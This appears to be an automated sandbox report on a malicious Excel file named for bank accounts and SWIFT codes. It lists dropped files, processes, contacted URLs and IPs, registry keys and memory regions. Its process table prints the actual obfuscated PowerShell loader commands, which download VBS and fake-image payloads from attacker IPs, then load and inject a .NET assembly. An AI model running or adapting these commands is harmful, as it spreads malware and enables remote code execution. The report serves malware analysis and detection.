Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 08:19:03 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\EvengIEcache[1].hta
|
HTML document, ASCII text, with very long lines (65498), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
|
data
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\eveningfiledatinglover[1].vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48B4810C.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2E31577.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\1vaomz5u.ft1.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESC2C3.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Jul 3 16:03:32 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (333)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\n1no2lop.boj.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\pibo52rt.udq.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\z52cpx5v.dul.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF9497146B9A365AE9.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFD2A101440BB1BACA.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFE45887675C4B6D5D.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\46930000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 17:03:51 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\46930000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\Cuentas bancarias y cdigo ##Swift incorrecto.xla.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 17:03:51 2024, Security: 1
|
dropped
|
There are 15 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS
-nOp -W 1 -C
deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
poWersHEll -ex bYPAsS -nOp
-W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE
; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm;
Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) }
catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne
Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm;
Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag);
if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h
= Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes
= [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes);
Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull,
[object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm))
} }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2C3.tmp"
"c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://91.92.254.194/imge/new-image_v.jpg
|
91.92.254.194
|
|
|
|
http://198.46.178.144/madamwebbbbbbbas6444.txt
|
198.46.178.144
|
|
|
|
http://91.92.254.194
|
unknown
|
|
|
|
http://198.46.178.144/eveningfiledatinglover.vbs
|
198.46.178.144
|
|
|
|
http://198.46.178.144/EvengIEcache.hta
|
198.46.178.144
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://198.46.178.144/EvengIEcache.hta...e
|
unknown
|
||
|
http://hop.fyi/ppltLl
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://hop.fyi/ppltLT8
|
unknown
|
||
|
http://hop.fyi/ppltLh
|
unknown
|
||
|
http://91.92.254.194/imge/new-image_v.jpgxRm;
|
unknown
|
||
|
http://198.46.178.144/EvengIEcache.htax
|
unknown
|
||
|
http://hop.fyi/ppltLP8
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://198.46.178.144
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://hop.fyi/ppltL
|
192.185.89.92
|
||
|
http://198.46.178.144/EvengIEcache.hta6o
|
unknown
|
||
|
http://198.46.178.144/f
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://198.46.178.144/j
|
unknown
|
||
|
http://198.46.178.144/eveningfiledatinglover.vbst
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://198.46.178.144/EvengIEcache.hta...
|
unknown
|
||
|
http://198.46.178.144/eveningfiledatinglover.vbsp
|
unknown
|
||
|
http://198.46.178.144/EvengIEcache.htaZ
|
unknown
|
||
|
http://hop.fyi/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://hop.fyi/ppltLB
|
unknown
|
||
|
http://198.46.178.144/EvengIEcache.hta/
|
unknown
|
||
|
http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt
|
unknown
|
||
|
http://198.46.178.144/EvengIEcache.htaC:
|
unknown
|
||
|
http://198.46.178.144/eveningfiledatinglover.vbstt
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://198.46.178.144/EvengIEcache.htahttp://198.46.178.144/EvengIEcache.hta0
|
unknown
|
||
|
http://198.46.178.144/eveningfil
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://go.cr
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 38 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
|
|
|
hop.fyi
|
192.185.89.92
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
198.46.178.144
|
unknown
|
United States
|
|
|
|
94.156.65.247
|
unknown
|
Bulgaria
|
|
|
|
91.92.254.194
|
unknown
|
Bulgaria
|
|
|
|
192.185.89.92
|
hop.fyi
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
`-
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
bg-
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3ACF2
|
3ACF2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 58 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
1241D000
|
trusted library allocation
|
page read and write
|
|
|
|
164000
|
heap
|
page read and write
|
||
|
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A57000
|
trusted library allocation
|
page read and write
|
||
|
1AF5E000
|
stack
|
page read and write
|
||
|
325000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB000
|
stack
|
page read and write
|
||
|
1BF0000
|
heap
|
page read and write
|
||
|
4E9D000
|
heap
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
40D000
|
heap
|
page read and write
|
||
|
3509000
|
heap
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2371000
|
trusted library allocation
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
34BA000
|
heap
|
page read and write
|
||
|
3421000
|
heap
|
page read and write
|
||
|
43A5000
|
heap
|
page read and write
|
||
|
34C2000
|
heap
|
page read and write
|
||
|
2311000
|
trusted library allocation
|
page read and write
|
||
|
375000
|
heap
|
page read and write
|
||
|
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
|
4395000
|
heap
|
page read and write
|
||
|
7FE89960000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B1000
|
heap
|
page read and write
|
||
|
272F000
|
stack
|
page read and write
|
||
|
43B3000
|
heap
|
page read and write
|
||
|
1C33A000
|
heap
|
page read and write
|
||
|
50D5000
|
heap
|
page read and write
|
||
|
3C90000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
1C69E000
|
stack
|
page read and write
|
||
|
3449000
|
heap
|
page read and write
|
||
|
123BD000
|
trusted library allocation
|
page read and write
|
||
|
4AF0000
|
trusted library allocation
|
page read and write
|
||
|
49C000
|
heap
|
page read and write
|
||
|
2510000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
34EF000
|
heap
|
page read and write
|
||
|
104000
|
heap
|
page read and write
|
||
|
3E9E000
|
heap
|
page read and write
|
||
|
152000
|
trusted library allocation
|
page read and write
|
||
|
1A5FD000
|
stack
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
3B3C000
|
stack
|
page read and write
|
||
|
4F8000
|
heap
|
page read and write
|
||
|
3B8000
|
stack
|
page read and write
|
||
|
1A5A5000
|
heap
|
page read and write
|
||
|
34B8000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
102000
|
heap
|
page read and write
|
||
|
2A99000
|
trusted library allocation
|
page read and write
|
||
|
310000
|
trusted library allocation
|
page read and write
|
||
|
2E38000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
|
3EBF000
|
stack
|
page read and write
|
||
|
296000
|
stack
|
page read and write
|
||
|
7FE898C4000
|
trusted library allocation
|
page read and write
|
||
|
3445000
|
heap
|
page read and write
|
||
|
5B8000
|
trusted library allocation
|
page read and write
|
||
|
342A000
|
heap
|
page read and write
|
||
|
2F0000
|
trusted library section
|
page read and write
|
||
|
50B5000
|
heap
|
page read and write
|
||
|
3509000
|
heap
|
page read and write
|
||
|
34C1000
|
heap
|
page read and write
|
||
|
1B124000
|
heap
|
page read and write
|
||
|
4DE0000
|
heap
|
page read and write
|
||
|
1AA18000
|
stack
|
page read and write
|
||
|
20D000
|
heap
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
1231F000
|
trusted library allocation
|
page read and write
|
||
|
3675000
|
trusted library allocation
|
page read and write
|
||
|
1A66F000
|
heap
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
2E36000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A7C000
|
trusted library allocation
|
page read and write
|
||
|
49C000
|
heap
|
page read and write
|
||
|
3451000
|
heap
|
page read and write
|
||
|
364D000
|
trusted library allocation
|
page read and write
|
||
|
4780000
|
heap
|
page read and write
|
||
|
4D0C000
|
stack
|
page read and write
|
||
|
39A5000
|
heap
|
page read and write
|
||
